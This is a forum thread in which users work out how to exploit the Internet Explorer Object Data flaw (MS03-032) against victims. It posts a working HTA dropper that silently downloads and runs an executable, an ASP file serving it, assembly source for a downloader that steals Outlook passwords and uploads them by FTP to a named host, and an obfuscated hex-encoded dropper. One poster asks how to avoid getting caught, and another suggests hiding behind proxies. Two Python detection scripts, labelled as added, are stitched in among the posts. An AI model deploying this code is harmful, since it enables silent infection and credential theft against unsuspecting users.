secTraq
(previously posted in thread "new Exploit for IE". Moved here to discuss specifically the Internet Explorer Object Data Remote Execution Vulnerability)

Hi everyone,

This is my first post and therefore I would like to use this occasion to thank you all for sharing information and participating in governmentsecurity. I highly respect the effort and knowledge you bring to this forum.

RESEARCH:
I have done some research about the "new IE Exploit" and gathered the following information:

This vulnerability is called "Internet Explorer Object Data Remote Execution Vulnerability" and is one of three exploits described in MS Security Bulletin MS03-032.

The full disclosure of this exploit (written by eEye) can be read at:
http://lists.netsys.com/pipermail/full-dis...ust/008705.html.

Two different demonstrations of this exploit can be found at:

http://www.secunia.com/MS03-032/ and http://www.finjan.com/mcrc/demos/objectdata/

CONCLUSIONS:
Based on the information gathered, I make the following conclusions:

In short, IE permits the execution of arbitrary code because it checks the extension of the file stated in the object data tag in the requesting HTML page. If the extension is .html, IE does not check any further. The server then returns an unsafe file (with an .html extension though). The client then executes the file based upon the information in the Content-Type header for the unsafe file returned, so if it says, e.g., application/hta, it executes the file.

The default configuration for IE is to not execute unsafe ActiveX in the Internet zone, and to ask whether it should execute unsafe ActiveX in the Local zone. The reason this exploit is needed in the first place is to execute arbitrary code on a computer in the Internet zone, and to do it without the victim noticing.

The tricky part is how to set up a web server, place the exploit on it, and do what the two demonstrations linked above do: execute arbitrary code (with the potential to run without the victim noticing it).

Doing this would be the key to successfully exploiting whoever you want to exploit.

TESTING:
However, when I run Apache or Xserver and try to exploit myself ;-), the code does not get executed when I connect through the Internet zone (e.g. http://**.***.***.**/exploitRequestingPageWithObjectDataTag.html); an error tells me there is a script error on the page, asking whether I want to proceed with the script or cancel. It doesn't matter what is chosen, the script doesn't execute.

When I connect through the Local zone (e.g. http://localhost/exploitRequestingPageWithObjectDataTag.html) I get asked
if I want to execute the potentially malicious ActiveX; if I choose "yes", it gets executed.

Note: All tests have been done with the default IE settings for ActiveX. All tests have been done with various scripts (including basic ones such as just running cmd.exe).

Does the answer to this problem lie in the configuration of Apache?

PROCEEDING:
I am working hard on proceeding. The demonstrations prove that executing arbitrary code can be done. I will keep you informed about further progress and would be thankful if you do the same.

secTraq
secTraq
UPDATE:

illwill has created another proof of this vulnerability.
CAUTION: The link below will execute the actions listed below WITHOUT you being able to stop/notice it unless you have antivirus auto-protection running. I quote illwill as he wrote in his post in topic "new Exploit for IE" (page 5):

--------------------------------------------------------------------------------------------

http://doomdead.com/users/illwill

downloads and executes an executable from the website, which in this case is a webdownloader I (illwill) made, that in turn downloads an IE/Outlook saved password revealer that uploads to my (illwill's) FTP

have fun

(illwill)

---------------------------------------------------------------------------------------------
w00dy
Here is the code that is executed. It's not all that hazardous. And it's amazing I was able to get the source.

CODE
<HTML>
<HEAD>
<TITLE></TITLE>
   <HTA:APPLICATION ID="PsyBot"
    APPLICATIONNAME="PsyBotInstaller"
    BORDER="none"
    BORDERSTYLE="normal"
    CAPTION="no"
    ICON=""
    CONTEXTMENU="no"
    MAXIMIZEBUTTON="yes"
    MINIMIZEBUTTON="yes"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"/>

<script LANGUAGE="VBScript">
MyFile = "c:\me.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BinaryData" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://*******/DCOM2.exe"", False " & vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "BinaryData = xml.ResponseBody" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BinaryData" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""c:\test.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell"  & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""c:\test.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing

Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\me.vbs", 0, false
</SCRIPT>
<script>
window.close()
</script>
</HEAD>
</html>
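The HTA above writes a VBScript to disk, launches it with the script host, and that script saves and runs a downloaded executable. From a defender's side that is a recognisable process chain: browser, then mshta.exe, then wscript.exe running a .vbs from a writable path, then an executable from the drive root. The following is an added example, not code from the thread or from any of its posters; it runs three such rules over a constructed, simplified process-creation log (the `pid=... ppid=... image=... cmdline=...` format and the hypothetical `example.invalid` host are my assumptions, modelled loosely on what EDR or Sysmon process-creation events carry).

```python
"""Process-chain detection for the HTA -> VBScript -> dropped EXE pattern.

Added example (not from the thread). The log format below is a constructed,
simplified process-creation record; real telemetry carries the same fields
(pid, parent pid, image path, command line) under other names.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-cased full path of the executable
    cmdline: str


# Constructed sample: one benign process and one infection chain like the one
# the posted HTA produces. The host name is a placeholder, not a real site.
SAMPLE_LOG = """\
pid=1204 ppid=840  image=C:\\Program Files\\Internet Explorer\\iexplore.exe cmdline="iexplore.exe" http://example.invalid/page.html
pid=1320 ppid=1204 image=C:\\WINNT\\system32\\mshta.exe cmdline=mshta.exe http://example.invalid/cmd.asp
pid=1388 ppid=1320 image=C:\\WINNT\\system32\\wscript.exe cmdline=wscript.exe c:\\me.vbs
pid=1410 ppid=1388 image=C:\\test.exe cmdline=c:\\test.exe
pid=1500 ppid=840  image=C:\\WINNT\\system32\\notepad.exe cmdline=notepad.exe readme.txt
"""

LINE_RE = re.compile(r'pid=(\d+)\s+ppid=(\d+)\s+image=(.+?)\s+cmdline=(.*)$')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# An .exe directly in a drive root, or anywhere under a temp directory.
DRIVE_ROOT_EXE = re.compile(r'^[a-z]:\\[^\\]+\.exe$')


def parse_log(text):
    """Parse the constructed log lines into ProcEvent records."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(ProcEvent(int(m[1]), int(m[2]), m[3].lower(), m[4]))
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1]


def in_odd_location(path):
    return bool(DRIVE_ROOT_EXE.match(path)) or "\\temp\\" in path


def ancestors(ev, by_pid):
    """Walk the parent chain (guarding against pid reuse loops)."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def find_suspicious(events):
    """Return (pid, reason) for every event that matches one of three rules."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        name = basename(ev.image)
        parent = by_pid.get(ev.ppid)
        pname = basename(parent.image) if parent else ""
        chain_names = {basename(a.image) for a in ancestors(ev, by_pid)}
        if name == "mshta.exe" and pname == "iexplore.exe":
            alerts.append((ev.pid, "R1: browser launched the HTML Application host"))
        elif name in SCRIPT_HOSTS and pname == "mshta.exe":
            alerts.append((ev.pid, "R2: HTA spawned a script host (dropped .vbs)"))
        elif in_odd_location(ev.image) and "mshta.exe" in chain_names:
            alerts.append((ev.pid, "R3: executable in drive root/temp descended from mshta.exe"))
    return alerts


if __name__ == "__main__":
    for pid, reason in find_suspicious(parse_log(SAMPLE_LOG)):
        print(pid, reason)
```

Rule R3 keys on ancestry rather than on the file name, so renaming `test.exe` does not evade it; the notepad event shares the same top-level parent but has no mshta.exe ancestor and is left alone.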
secTraq
Thanks for the code w00dy. (Unfortunately) this is only one piece of the puzzle.

This code uses the extension .asp. When the page containing the code you uploaded is requested by the client, the server returns the value "application/hta" (HTML application) in the Content-Type header. The request is triggered by an object data tag referring to a link with the extension .asp, loaded by the client through a website or a crafted HTML email.

This is one part of making the exploit work.

The second part: nobody I know of (except eEye Software, Finjan Security and a user of this forum named illwill, who unfortunately hasn't shared his knowledge up to this point; of course he has the right not to share it, maybe he is just too busy to share, we do not know, and no matter what I respect his work) knows what additionally has to be done to successfully make use of this exploit.

Anyway, in order for the exploit posted by illwill to work, the web page requesting the code you uploaded looks like this:

<html>
<object style="display:none" data="cmd.asp">
</object>
<h1> hi i'm illwill</h1>
</html>


But like I said, this alone will probably not make this new great exploit work. Maybe the web server providing the content must be configured in a specific way.
Please let me know if you have any idea how this could work.
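The mechanism laid out in secTraq's first post and again here comes down to two observable facts: a resource whose URL ends in a harmless-looking extension (.html, .asp) is served with an executable Content-Type such as application/hta, and the requesting page carries a hidden `<object data=...>` element. Both can be checked by whoever owns the proxy, the IDS or the web server. The code below is an added example, not something posted in the thread; the HTTP responses and the HTML page are constructed samples, and `example.invalid` is a placeholder host.

```python
"""Two defensive checks for the Object Data content-type trick.

Added example (not from the thread). Sample responses/pages are constructed.
"""
import posixpath
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Content types that cause IE to run the body instead of rendering it.
EXEC_TYPES = {"application/hta", "application/octet-stream", "application/x-msdownload"}
# Extensions a page author expects to be rendered, not executed.
BENIGN_EXT = {".html", ".htm", ".asp", ".txt", ".gif", ".jpg"}


def parse_response(raw):
    """Split a raw HTTP response into (status line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def content_type_mismatch(url, raw_response):
    """Return a description if a benign-looking URL is served as executable content."""
    _, headers, _ = parse_response(raw_response)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    if ext in BENIGN_EXT and ctype in EXEC_TYPES:
        return f"{url}: extension {ext} served as {ctype}"
    return None


class HiddenObjectFinder(HTMLParser):
    """Collect data= targets of <object> elements that are hidden from the user."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "object":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or a.get("width") == "0" or a.get("height") == "0"
        if "data" in a and hidden:
            self.hits.append(a["data"])


def hidden_object_targets(html):
    parser = HiddenObjectFinder()
    parser.feed(html)
    return parser.hits


# Constructed samples: the shape of the page quoted above, a response that
# serves cmd.asp as an HTML Application, and a normal text/html response.
PAGE = ('<html>\n<object style="display:none" data="cmd.asp">\n</object>\n'
        '<h1> hi </h1>\n<object data="movie.swf" width="320" height="240"></object>\n</html>')
RESP_HTA = "HTTP/1.1 200 OK\r\nContent-Type: application/hta\r\nContent-Length: 0\r\n\r\n"
RESP_OK = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<html></html>"

if __name__ == "__main__":
    print(hidden_object_targets(PAGE))
    print(content_type_mismatch("http://example.invalid/cmd.asp", RESP_HTA))
    print(content_type_mismatch("http://example.invalid/index.html", RESP_OK))
```

The header check deliberately ignores the file name the browser sees and trusts only what the server actually sent, which is exactly the gap IE's extension check left open; the page check flags the hidden element regardless of what extension its data attribute carries.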
secTraq
Just some thoughts:

This vulnerability, once every aspect of it is known, will be very easy to take advantage of - only in legal ways of course. As the patch for this was released just a week ago, one week after the DCOM worm started to attack, it is very likely that almost every Windows box, not every one of course, is vulnerable at this moment, but I assume that patches now, after the DCOM worm, will be applied sooner than in the past. Also, I believe that because fewer technical skills are required to use this exploit, and marketers for dialers etc. could potentially use it, and (I don't think anybody has mentioned it before, but I think it is possible) email worms using this exploit could spread, this will be patched as soon as it gets in the wild! So m8tz we are working against the clock - would be happy to see you participate. There is still a good timeframe we have here.

Cheers and goodnight for now!
fiprotec
Hi all,

The script downloads http://./DCOM2.EXE to your C:\ (it is renamed to C:\TEST.EXE).

Test.exe is a webdownloader that executes http://./PSPV.EXE (cf. http://riedersoft.myftp.org:85/~users/nirs...tils/pspv.html)

The command line is: pspv.exe /shtml snagged.html (it produces a file "snagged.html" with your Outlook password). Then the HTML file is sent to an FTP server and deleted from your hard drive.

Here is a sample of test.exe disassembled..

See ya

[CODE]
;------------------------------------------------------------------------------
; Name: .data
; Virtual Address: 00403000h Virtual Size: 0000035Ch
; Pointer To RawData: 00000800h Size Of RawData: 00000200h
;
SSZ00403000_pspv_exe__shtml_snagged_html:
db 'pspv.exe /shtml snagged.html',0
SSZ0040301D_illmob_ath_cx:
db 'illmob.ath.cx',0
SSZ0040302B_ftp__n__s__s__s:
db 'ftp -n -s:%s %s',0
SSZ0040303B_snagged_html:
db 'snagged.html',0
SSZ00403048_upload_ftp:
db 'upload.ftp',0
SSZ00403053_pspv_exe:
db 'pspv.exe',0
SSZ0040305C_home:
db 'home',0
SSZ00403061_pass:
db 'pass',0
SSZ00403066_user__s__s__mkdir__s__cd__s__put:
db 'user %s %s',0Dh,0Ah,'mkdir %s',0Dh,0Ah,'cd %s',0Dh,0Ah,'put %s',0Dh,0Ah,'bye',0
SSZ0040308F_http___www_illmob_org_pspv_exe:
db 'http://www.illmob.org/pspv.exe',0
db 00h;
db 00h;


....

;------------------------------------------------------------------------------
mrBob
Think I'm gonna follow this thread too
illwill
<%
Response.buffer = TRUE


Response.Clear()
Response.ContentType = "application/octet-stream"
Response.Flush()
Response.WriteFile("c:\test.exe")

Response.End
%>

name it download.asp

Also, here is the code for my webdownloader.... have fun
~ illwill
www.illmob.org

.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
include \masm32\include\urlmon.inc

;| Libraries:
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\urlmon.lib




.data
Redir db "pspv.exe /shtml snagged.html",0
FTPsite db 'illmob.ath.cx',0
FTPstring db 'ftp -n -s:%s %s',0
Passes db 'snagged.html',0
cmds db "upload.ftp",0
passrape db "pspv.exe",0
user db "home", 0
pass db "pass", 0
fmt db "user %s %s",0Dh, 0Ah
db "mkdir %s",0Dh, 0Ah
db "cd %s",0Dh, 0Ah
db "put %s",0Dh, 0Ah
db "bye",0
web db 'http://www.illmob.org/pspv.exe',0,32 dup(0)
.data?
UserName db 256 dup(?)
UserNameLen dd ?
usernamebuff db 256 dup(?)
sitebuff db 128 dup(?)
hFile dd ?
fwritten dd ?
.code
start:
push 0
push 0
push offset passrape
push offset web
push 0
call URLDownloadToFileA
invoke WinExec,addr Redir, SW_HIDE
invoke Sleep,1000 ; let the passwords fill up
mov UserNameLen, SIZEOF UserName
invoke GetUserName, addr UserName, addr UserNameLen
invoke wsprintf,addr usernamebuff,addr fmt,addr user,addr pass,addr UserName,addr UserName,addr Passes
invoke wsprintf,addr sitebuff,addr FTPstring,addr cmds,addr FTPsite
;create a upload.ftp file that has the ftp cmds in it in it
invoke CreateFile,ADDR cmds,GENERIC_WRITE,FILE_SHARE_READ,
0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN,0
mov hFile,eax
invoke lstrlen,ADDR usernamebuff
invoke WriteFile,hFile,ADDR usernamebuff,eax,ADDR fwritten,0
invoke CloseHandle,hFile
invoke WinExec, addr sitebuff, SW_HIDE
invoke Sleep,8000 ;let that shit finish or the delete will (filtered) it up
invoke DeleteFile, addr cmds
invoke DeleteFile, addr Passes
invoke DeleteFile, addr passrape
invoke ExitProcess, eax
end start

n0vun
Alright, y'all tell me if this works....

http://www.clikear.com/webs4/n0vun/

It loads a malware dummy file. (So I hope) ;-)


mojo
It works!

how did you do it?
secTraq
Thanks illwill for sharing that great, wonderful knowledge with us!

n0vun, when I allow your script to run, the script still has an error.
secTraq
Hasn't worked for me yet as well.
secTraq
NOTE FOR APACHE USERS:

If you would like to follow illwill's .asp solution, you can do that with Apache as well:

http://wwws.sun.com/software/chilisoft/index.html

Cheers
woutiir
Let me get this picture clear.

You guys are trying to take advantage of this IE object data remote execution vulnerability in such a way that when an IE user comes to a given HTML file, the HTML file, or IE actually, will execute a given command; in the case described here, it downloads a file (more of a trojan really) and uploads your Outlook Express password file to an FTP.

What you guys are trying to do is the same but for your personal use, for example, do the same to your own FTP.

Though, you guys, or shall I say we, do not have enough information to get this to work? Or am I totally wrong now.

And another thing is, have we bypassed the 'notice' thingy already? Or is that also a problem.

Second thing is AV (antivirus). Is that being bypassed also?

Thanks,
woutiir
secTraq
QUOTE
What you guys are trying to do is the same but for your personal use, for example, do the same to your own FTP.


Exactly. For me personally, I am not seeking to use this exploit widely; it's more the fun and of good educational value to me. I have learned quite a lot in these hours doing research and analysing code. Right now I am learning VBScript and ASP.

QUOTE
Though, you guys, or shall I say we, do not have enough information to get this to work? Or am I totally wrong now.


I believe only a handful of people have already managed to get this thing to work, as this exploit is rather new. But I do believe that the information provided in this topic should be enough to get it to work. As I said, I am learning VBScript and ASP now; that should do it, I hope. I am using http://www.w3schools.com to learn these languages.

QUOTE
And another thing is, have we bypassed the 'notice' thingy already? Or is that also a problem.


No, the exploit is the reason for not getting the notice and letting the script on the page execute silently.

QUOTE
Second thing is AV (antivirus). Is that being bypassed also?


In my first post I posted a link to two examples. Those two were not detected by my AV. illwill's example is detected by AV.

If you happen to get this exploit to work, please let me know; I would be very interested in your solution.
secTraq
A Guide to HTML Applications (HTAs) http://msdn.microsoft.com/library/default....htaoverview.asp
n0vun
@mojo: I just used what illwill posted right before my post

@secTraq: what kind of error?

Let's try again, tell me if it works!

http://www.clikear.com/webs4/n0vun

secTraq
Here you go n0vun..

Well, I don't live in an English-speaking country, so I have to translate the error; I'll do my best..

-------------------------
Title: Internet Explorer
! Script Error on page
Row: 79
Column:1
Error: Object needed 'WScript'
Code: 0
URL: http://www.clkear.com/webs4/nOvun/download.asp

Should this page be executed further?
YES / NO
-------------------------

Despite the error, you have made more progress than I have until now. Could you post the exact source of all the files you have placed on your server for this exploit? It would help.


secTraq
=> n0vun

Now you did it! I was shocked when I saw my screen burn; nothing bad happened though, I hope!

Please share the source code.
mojo
I don't understand how you get illwill's download.asp to point to a file you want to download to the victim. If you could explain that much, I would be grateful.
secTraq
I have problems writing the code of the download page, because I am not familiar with ASP and VBScript.
schnibble
I suppose this is the code?
QUOTE
<HTA:APPLICATION ID="oMyApp" SHOWINTASKBAR="no" WINDOWSTATE="minimize" SINGLEINSTANCE="no" BORDER="none">

<title>Hello there!!</title>

<script language=vbs>

self.MoveTo 5000, 5000

dim v(24)
cut=""

v(0)=& quot;4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72
,y1C,79,y3,9E,y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E
,D8,B8,y,A0,8E,C0,C3,66"
v(1)=& quot;,B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,
04,2B,D8,2B,D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E
,33,z,33,F6,F3,66,A5,C3"
v(2)=& quot;,1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2
C,01,F3,A4,8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,4
8,03,BA,C8,03,32,C0,EE"
v(3)=& quot;,42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,
FB,EC,A8,08,74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21
,yF,B1,C0,90,1D,7B"
v(4)=& quot;,88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1
,8C,B1,77,98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6
C,45,24,BF,21,97,8E,D0,8A"
v(5)=& quot;,1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A
,38,97,96,2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,6
4,84,1B,5A,D9,1D,CE,AF,36"
v(6)=& quot;,3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,9
7,C8,4B,C2,C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,
20,A9,D5,23,19,55,4C,55,AA"
v(7)=& quot;,62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46
,6B,61,6B,2A,7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,2
1,BE,1B,6C,90,B0,D8,73,91"
v(8)=& quot;,50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84
,56,A8,A0,AE,1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5
E,55,46,BB,BE,14,C5,1A,45"
v(9)=& quot;,5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6
,7D,BB,15,BE,78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,8
4,8A,55,5D,35,1F,71,25,92"
v(10)=& quot;,79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D
0,14,67,39,2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,
BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=& quot;,D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B
3,1F,D3,53,20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,
6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=& quot;,B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28
,1B,14,BF,6F,A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C
0,4D,3D,A4,C0,5A,90,65,38"
v(13)=& quot;,53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E
,51,95,5E,A2,3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,B
F,B9,75,65,5E,B3,3C,8C,94"
v(14)=& quot;,41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A
,5E,CB,A7,6F,47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5
B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=& quot;,44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D
,3D,AA,48,7D,AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,8
0,A0,99,9D,93,89,93,90,88"
v(16)=& quot;,90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B
,D8,A1,5B,9F,63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,8
0,4D,21,37,96,29,69,4A,C6"
v(17)=& quot;,4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47
,A2,8E,B1,84,51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,
0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=& quot;,14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20
,y2,21,y2,22,y2,23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y
2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=& quot;,32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E
,y2,3F,y2,3F,y2,3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F
,08,y,3F,09,y,3F"
v(20)=& quot;,0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13
,y,3F,14,y,3F,15,y,3F,16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D
,y,3F"
v(21)=& quot;,1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27
,y,3F,28,y,3F,29,y,3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31
,y,3F"
v(22)=& quot;,32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B
,y,3F,3C,y,3F,3D,y,3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,
3F2,06,3F2,07,3F2,08"
v(23)=& quot;,3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,
13,3F2,14,3F2,15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,
3F2,1F,3F2,20,3F2,21,3F2,22,3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=& quot;,3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,
31,3F2,32,3F2,33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,
3F2,3D,3F2,3E,3F5,3F"

function res(x,y)
For k = 0 To UBound(v)
  v(k) = Replace(v(k), x, y)
Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next

For m = 0 To UBound(v)
it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = fso.getspecialfolder(2) & "\fooware.exe"
if fso.fileexists(pth) then fso.deletefile(pth)
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
  r = Int("&H" & Mid(tmp(i), 3, l))
  For j = 1 To r
  f.Write Chr(b)
  Next
Else
  f.Write Chr(b)
End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)

</script>
secTraq
Is it? It doesn't work for me. I would like to see the full code of the .asp page, including the code that gets interpreted by the web server and that we do not see when looking at the source of the web page.
what
I have code that downloads and executes a program with a fully patched version of IE, and Norton does not detect it. These are the conditions under which I will share the code. . . .

1. I want to utilize this, but not get caught. Is there any way that I can log the IP address of the victim without giving them my IP address (such as connecting to IRC or some type of middle man)?

2. This code is not for wide and varied distribution. Be careful with it. It stays in the forum; don't share, or we will both go down. . . .

That's it. The people in here are smart, and when motivated, can do anything they want. If you need motivation, reread.
mojo
I found out what I was doing wrong; basically take cmd.asp posted by illwill and play with the VBScript.

Right now, I just made this...

<script LANGUAGE="VBScript">
Dim strName
strName = "Victim"

Msgbox "Hello " + strName, vbExclamation + _
vbOKOnly, "Test Message Box"
</SCRIPT>

and it worked... so the VBS is the key...
secTraq
what =>

I don't know if it would work, but I suppose you could open an account at a free web host, connecting anonymously through an anonymous proxy server. Then make the client upload its IP to that server through FTP.

As I wrote earlier, I am not interested in using this code widely. I only use this code for education.

Would be very thankful if you share it.
what
OK, I would like something a little bit better, but I believe I can trust you to find a more "for sure" method. I was wondering if I could connect to an IRC channel and post the IP (which I made a prog in VB to do), but if mswinsck.ocx is not installed, then I am SOL. Here is the exploit that will show you the proof of concept. I believe the name of the program is appropriate. All the program does is output "Commands can be executed!" to the user, then closes. The name of the prog is "poc.exe". Check out the source for yourself.
secTraq
=> mojo

